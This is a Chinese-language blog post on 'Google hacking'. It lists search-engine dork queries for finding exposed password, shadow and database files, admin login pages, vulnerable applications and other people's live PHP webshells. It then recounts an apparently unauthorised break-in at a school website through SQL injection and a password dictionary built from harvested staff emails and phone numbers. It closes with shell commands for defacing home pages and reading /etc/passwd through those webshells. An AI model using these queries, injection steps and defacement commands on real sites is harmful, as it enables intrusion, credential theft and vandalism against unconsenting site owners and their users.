跳到主要內容

GooGle Hack:讓你瞬間成為黑客

GooGle Hack:讓你瞬間成為黑客



google hacking其實並算不上什麼新東西,當時並沒有重視這種技術,認為webshell什麼的,並無太大實際用途。google hacking其實並非如此簡單...



  常用的google關鍵字:



  foo1 foo2 (也就是關聯,比如搜索xx公司 xx美女)



  operator:foo



  filetype:123 類型



  site:foo.com 相對直接看網站更有意思,可以得到許多意外的訊息



  intext:foo



  intitle: fooltitle 標題哦



  allinurl:foo 搜索xx網站的所有相關連接。(踩點必備)



  links:foo 不要說就知道是它的相關鏈接



  allintilte:foo.com



  我們可以輔助"-" "+"來調整搜索的精確程度



  直接搜索密碼引號表示為精確搜索)



  當然我們可以再延伸到上面的結果裡進行二次搜索



  "index of" htpasswd / passwd



  filetype:xls username password email



  "ws_ftp.log"



  "config.php"



  allinurl:admin mdb



  service filetypewd ....或者某個比如pcanywhere的密碼後綴cif等



  越來越有意思了,再來點更敏感訊息



  "robots.txt" "Disallow:" filetype:txt



  inurl:_vti_cnf (FrontPage的關鍵索引啦,掃瞄器的CGI庫一般都有地)



  allinurl: /msadc/Samples/selector/showcode.asp



  /../../../passwd



  /examples/jsp/snp/snoop.jsp



  phpsysinfo



  intitle:index of /admin



  intitle:"documetation"



  inurl: 5800(vnc的連接阜)或者desktop port等多個關鍵字檢索



  webmin port 10000



  inurl:/admin/login.asp



  intextowered by GBook365



  intitle:"php shell*" "Enable stderr" filetypehp 直接搜索到phpwebshell



  foo.org filetype:inc



  ipsec filetype:conf



  intilte:"error occurred" ODBC request where (select|insert) 說白了就是說,可以直接試著查查資料庫檢索,針對目前流行的sql注射,會發達哦



  "Dumping data for table" username password



  intitle:"Error using Hypernews"



  "Server Software"



  intitle:"HTTP_USER_AGENT=Googlebot"



  "HTTP_USER_ANGET=Googlebot" THS ADMIN



  filetype:.doc site:.mil classified 直接搜索軍方相關word



  檢查多個關鍵字:



  intitle:config confixx login password



  "mydomain.com" nessus report



  "report generated by"



  "ipconfig"



  "winipconfig"



  google快取記憶體利用(hoho,最有影響力的東西)推薦大家搜索時候多"選搜索所有網站"



  特別推薦:administrator users 等相關的東西,比如名字,生日等……最慘也可以拿來做字典嘛



  ……



一些技巧集合:



  1) index.of.password



  1) filetype:blt "buddylist"



  2) "access denied for user" "using password"



  2) intitle:"index of" inurl:ftp (pub | incoming)



  3) "http://*:*@www" domainname



  3) filetype:cnf inurl:_vti_pvt access.cnf



  4) auth_user_file.txt



  4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"



  5) The Master List



  5) inurl:"install/install.php"



  6) allinurl: admin mdb



  6) intitle:"welcome.to.squeezebox"



  7) passlist.txt (a better way)



  7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"



  8) "A syntax error has occurred" filetype:ihtml



  8) intitleogin intext:"RT is ? Copyright"



  9) "# -FrontPage-" inurl:service.pwd



  9) exthp program_listing intitle:MythWeb.Program.Listing



  10) ORA-00921: unexpected end of SQL command



  10) intitle:index.of abyss.conf



  NO2:



  --------------------------------------------------------------------------------



  google hacking的簡單實現



  使用google中的一些語法可以提供給我們更多的訊息(當然也提供給那些習慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的語法.



  intext:



  這個就是把網頁中的正文內容中的某個字元做為搜索條件.例如在google裡輸入:intext:動網.將返回所有在網頁正文部分包含"動網"的網頁.allintext:使用方法和intext類似.



  intitle:



  和上面那個intext差不多,搜索網頁標題中是否有我們所要找的字元.例如搜索:intitle:安全天使.將返回所有網頁標題中包含"安全天使"的網



  頁.同理allintitle:也同intitle類似.



  cache:



  搜索google裡關於某些內容的快取記憶體,有時候也許能找到一些好東西哦.



  define:



  搜索某個詞語的定義,搜索:define:hacker,將返回關於hacker的定義.



  filetype:



  這個我要重點推薦一下,無論是撒網式攻擊還是我們後面要說的對特定目標進行訊息收集都需要用到這個.搜索指定類型的文件.例如輸入



  :filetype:doc.將返回所有以doc結尾的文件URL.當然如果你找.bak、.mdb或.inc也是可以的,獲得的訊息也許會更豐富



  info:



  查找指定站點的一些基本訊息.



  inurl:



  搜索我們指定的字元是否存在於URL中.例如輸入:inurl:admin,將返回N個類似於這樣的連接http://www.xxx.com/xxx/admin,用來找管理員登



  陸的URL不錯.allinurl也同inurl類似,可指定多個字元.



  link:



  例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.



  site:



  這個也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個站有關的URL.



  對了還有一些*作符也是很有用的:



  + 把google可能忽略的字列如查詢範圍



  - 把某個字忽略



  ~ 同意詞



  . 單一的通配符



  * 通配符,可代表多個字母



  "" 精確查詢



下面開始說說實際應用



  以下內容均在google上搜索,對於一個居心叵測的攻擊者來說,可能他最感興趣的就是密碼文件了.而google正因為其強大的搜索能力往往會



  把一些敏感訊息透露給他們.用google搜索以下內容:



  intitle:"index of" etc



  intitle:"Index of" .sh_history



  intitle:"Index of" .bash_history



  intitle:"index of" passwd



  intitle:"index of" people.lst



  intitle:"index of" pwd.db



  intitle:"index of" etc/shadow



  intitle:"index of" spwd



  intitle:"index of" master.passwd



  intitle:"index of" htpasswd



  "# -FrontPage-" inurl:service.pwd



  有時候因為各種各樣的原因一些重要的密碼文件被毫無保護的暴露在網路上,如果被別有用心的人獲得,那麼危害是很大的



  同樣可以用google來搜索一些具有漏洞的程式,例如ZeroBoard前段時間發現個文件代碼洩露漏洞,可以用google來找網上使用這套程式的站點:



  intext:ZeroBoard filetypehp



  或者使用:



  inurlutlogin.php?_zb_path= site:.jp



  來尋找我們所需要的網頁面.phpmyadmin是一套功能強大的資料庫*作軟件,一些站點由於配置失誤,導致我們可以不使用密碼直接對phpmyadmin進行*作.我們可以用google搜索存在這樣漏洞的程式URL:



  intitlehpmyadmin intext:Create new database



  還http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir嗎?用google找找,你也許還可以找到很多古董級的機器。同樣我們可以用這個找找有其他cgi漏洞的網頁面。



  allinurl:winnt system32



  前面已經簡單的說過可以用google來搜索資料庫文件,用上一些語法來精確查找能夠獲得更多東西(access的資料庫,mssql、mysql的連接文件等等).舉個例子示例一下:



  allinurl:bbs data



  filetype:mdb inurl:database



  filetype:inc conn



  inurl:data filetype:mdb



  intitle:"index of" data //在一些配置不正確的apache+win32的服務器上經常出現這種情況,和上面的原理一樣,我們還可以用google來找後台.



  利用google完全是可以對一個站點進行訊息收集和滲透的,下面我們用google對特定站點進行一次測試。



  首先用google先看這個站點的一些基本情況(一些細節部分就略去了):



  site:xxxx.com



  從返回的訊息中,找到幾個該校的幾個系院的域名:



  http://a1.xxxx.com



  http://a2.xxxx.com



  http://a3.xxxx.com



  http://a4.xxxx.com



  順便ping了一下,應該是在不同的服務器.學校一般都會有不少好的資料,先看看有什麼好東西沒



  site:xxxx.com filetype:doc



  得到N個不錯的doc。



  先找找網站的管理後台地址:



  site:xxxx.com intext:管理



  site:xxxx.com inurl:login



  site:xxxx.com intitle:管理



  超過獲得2個管理後台地址:



  http://a2.xxxx.com/sys/admin_login.asp



  http://a3.xxxx.com:88/_admin/login_in.asp



還算不錯,看看服務器上跑的是什麼程式:



  site:a2.xxxx.com filetype:asp



  site:a2.xxxx.com filetypehp



  site:a2.xxxx.com filetype:aspx



  site:a3.xxxx.com filetype:asp



  site:.......



  ......



  a2服務器用的應該是IIS,上面用的是asp的整站程式,還有一個php的論壇



  a3服務器也是IIS,aspx+asp。web程式都應該是自己開發的。有論壇那就看看能不能遇見什麼公共的FTP帳號什麼的:



  site:a2.xxxx.com intext:ftp://*:*



  沒找到什麼有價值的東西。再看看有沒有上傳一類的漏洞:



  site:a2.xxxx.com inurl:file



  site:a3.xxxx.com inurl:load



  在a2上發現一個上傳文件檔案的網頁面:



  http://a2.xxxx.com/sys/uploadfile.asp



  用IE看了一下,沒權限訪問。試試注射,



  site:a2.xxxx.com filetype:asp



  得到N個asp網頁面的地址,體力活就讓軟件做吧,這套程式明顯沒有對注射做什麼防範,dbowner權限,雖然不高但已足矣,back a shell不太喜



  歡,而且看起來資料庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學校的站點的密碼都比較有規律,通常都是域名+



  電話一類的變形,用google搞定吧。



  site:xxxx.com //得到N個二級域名



  site:xxxx.com intext:*@xxxx.com //得到N個郵件地址,還有郵箱的主人的名字什麼的



  site:xxxx.com intext:電話 //N個電話



  把什麼的訊息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個帳號,2個是學生會的,1個管理員,還有一個可能是老師的帳號。登入上去:



  name:網站管理員



  pass:a2xxxx7619 //說了吧,就是域名+4個數位



  要再怎麼提權那就不屬於本文討論訪問了,呵呵,到此為止。



  這段時間在國外的一些google hack的研究站點看了看,其實也都差不多是一些基本語法的靈活運用,或者配合某個腳本漏洞,主要還是靠



  個人的靈活思維。國外對於google hack方面的防範也並不是很多,所以大家還是點到為止,不要去搞破壞拉,呵呵。對於一些在win上跑



  apache的網管們應該多注意一下這方面,一個intitle:index of就差不多都出來了



  1.查找利用php webshell



  intitle:"php shell*" "Enable stderr" filetypehp



  (注: intitle—網頁標題 Enable stderr—UNIX標準輸出和標準錯誤的縮寫filetype—文件類型)。搜索結果中,你能找到很多直接在機器上執



  行命令的web shell來。如果找到的PHPSHELL不會利用,如果你不熟悉UNIX,可以直接看看LIST,這裡就不詳細說了,有很多利用價值。要說明



  的是,我們這裡搜索出來的一些國外的PHPSHELL上都要使用UNIX命令,都是system調用出來的函數(其實用百度及其他搜索引擎都可以,只是填



  寫搜索的內容不同)。這個PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:



  echo "召喚" > index.jsp



  現在看看首頁,已經被我們改成: "召喚" 了。



  我們也可以用WGET上傳一個文件上去(比如你要替換的葉子吧)。然後execute Command輸入 cat file > index.html or echo "" > file



  echo "test" >> file



  這樣一條條打出來,站點首頁就成功被替換了。同樣的也可以



  uname -a;cat /etc/passwd



  不過有點要注意,有些WEBSHELL程式有問題,執行不了的,



  2.搜索INC敏感訊息



  在google的搜索框中填入:



  Code:



  .org filetype:inc

留言

這個網誌中的熱門文章

WUSON的CISSP課後筆記整理-葉柏毅Alex Yeh

  CISSP考試心得-Alex Yeh 心智圖 心智圖PDF Structure Architecture Framework Approach Methodology Domain 口訣 Domain 1. Security and Risk Management   C、I、A+GRC(安全和風險管理) Domain 2. Asset Security   盤點、分類、保護(資產安全) Domain 3. Security Architecture and Engineering   時時都安全、處處都安全(安全架構和工程) Domain 4. Communication and Network Security   處處都安全(通信及網路安全) Domain 5. Identity and Access Management (IAM)   I + 3A(身分識別及存取控制) Domain 6. Security Assessment and Testing   查驗、訪談、測試(安全評鑑及測試) Domain 7. Security Operations   日常維運、持續改善(安全維運) Domain 8. Software Development Security   時時都安全、處處都安全(軟體開發安全) 美國法定目標(FISMA)/ 資通安全法 CIA C機密性:資料不被偷 I完整性:資料不被竄改 A可用性:資料隨時可用 Integrity完整性 Data Integrity(資料完整性) Authenticity(資料真偽;真實性) Non-repudiation 不可否認性(法律上):傳送方不能否認未傳收;接受方不能否認未收到。 FISMA NIST FIPS 199 NIST SP 800 資產Asset:有價值Value的東西,且值得保護 Assets 通常指資訊系統 資料 電腦系統 操作系統 軟體 網路 資料中心(機房) 人(最重要) 業務流程 資安目標(定義): 透過安全管制措施,保護資訊資產不受到危害,以達到CIA目標 進而支持組織的業務流程 將安全融入組織業務流程(人事/採購),產銷人發財 支持組織的「產品」及「服務」持續交付 為公司創造價值,實現公司的使命及願景 公司最高經營階層的管理作為就叫做治理. 管理是達成目標的一套有系統的

[補充]Common Attacks

  參考來源: Wuson - Common-attacks  , Wiki 如翻譯或解釋有誤,歡迎提出更正。 Brute force: 蠻力攻擊 (英語:Brute-force attack) ,又稱為 窮舉攻擊 (英語:Exhaustive attack)或 暴力破解 ,是一種 密碼分析 的方法,即將密碼進行逐個推算直到找出真正的密碼為止。 Advanced Persistent Threat (APT) :高級長期威脅(英語:advanced persistent threat,縮寫:APT),又稱高級持續性威脅、先進持續性威脅等,是指隱匿而持久的電腦入侵過程,通常由某些人員精心策劃,針對特定的目標。其通常是出於商業或政治動機,針對特定組織或國家,並要求在長時間內保持高隱蔽性。高級長期威脅包含三個要素:高級、長期、威脅。高級強調的是使用複雜精密的惡意軟體及技術以利用系統中的漏洞。長期暗指某個外部力量會持續監控特定目標,並從其獲取數據。威脅則指人為參與策劃的攻擊。 Multi-vector, polymorphic attacks Buffer Overflows: 緩衝區溢位 (buffer overflow),在 電腦學 上是指標對 程式設計 缺陷,向程式輸入 緩衝區 寫入使之溢位的內容(通常是超過緩衝區能儲存的最巨量資料量的資料),從而破壞程式執行、趁著中斷之際並取得程式乃至系統的控制權。 Mobile Code: ActiveX, JavaApplet, Flash, JavaScript Malicious Software (Malware) Drive-by download attacks: 路過式下載 ,網頁掛馬攻擊 (Drive-by Downloads) Spyware Trojan Horse Keyloggers Password Crackers Spoofing欺騙 Masquerading,偽裝 Sniffers,竊聽 Eavesdropping,竊聽(隔牆有耳) Tapping,竊聽 Emanations 流出 and TEMPEST Spontaneous emission of electromagnetic radiation” (EMR) subject to TEMPEST eavesdropping 受 TEMPE

The Effective CISSP考試攻略

  資料來源: https://wentzwu.com/the-effective-cissp%e8%80%83%e8%a9%a6%e6%94%bb%e7%95%a5/ The Effective CISSP考試攻略 考試的難易 一個好的考試,通常會讓你準備的很辛苦!但通過考試後會讓你一直駡,怎麼考出來的題目沒有想像中難!但這就是一個好的考試!這種考試通常有一定的門檻及鑑別度。 到2020/07/01止,台灣有337位CISSP;2019/05/31是304位;2018/12/31是287位。 即使您在資訊軟體產業有相當的資歷,或已有資安的經驗,仍請不要忽視CISSP考試對資安治理、管理及技術的涵蓋面與勺鑽度。 一般而言,有十年以上工作經驗的朋友,可以將考試的目標訂在: 三個月到一年內 , 投入250小時到1000小時 作題目不少於2500題 考試的掌握度 CISSP考試大綱 要儘可能弄懂、裏頭的專有名詞不可以有看不懂的;必須能達到看得懂、說得出,並搭配作題目2500題以上,才能達到參加CISSP考試的基本門檻了。 作題目的最低標準:課本提供的線上題庫的全部題目,外加其它題庫1500題以上,都必須達到90%以上的水準。 答題技巧 考試的作答,基本上要以官方CBK、指定教材及NIST的指引為準。 除了K書,答題的技巧也要刻意練習及培養。 CISSP考試的題目,基本上都是透過社群運作,讓大家參與出題,所以題庫很大並且不斷在更新。因此,請著重在觀念的理解,力求以實力考過,不要迷信題目作很多或作考古題就會過。 應考策略 建議選擇在週一請假,並選在下午考試。 週六及週日可以用大塊的時間準備考試,讓自己進入戰鬥狀態。 睡個好眠後,週一上午持續複習;讓自己一直處於考試的戰鬥狀態。 下午考試當天,我個人不喝有刺激性的飲料(如咖啡)、習慣補一顆維他命B群(或考試前一個小時補充液態維他命),以及中午只吃輕食;進入考場前會先至洗手間用肥皂液洗手、深呼吸及舒展筋骨。 考試作答 作答時先刪去不可能的答案,再選一個對的或 最佳的 答案。 若是考簡體中文,不確定的題目可以標記(mark)起來,繼續作下一題,最後再回來作答。 若是考新版的英文試(CAT 1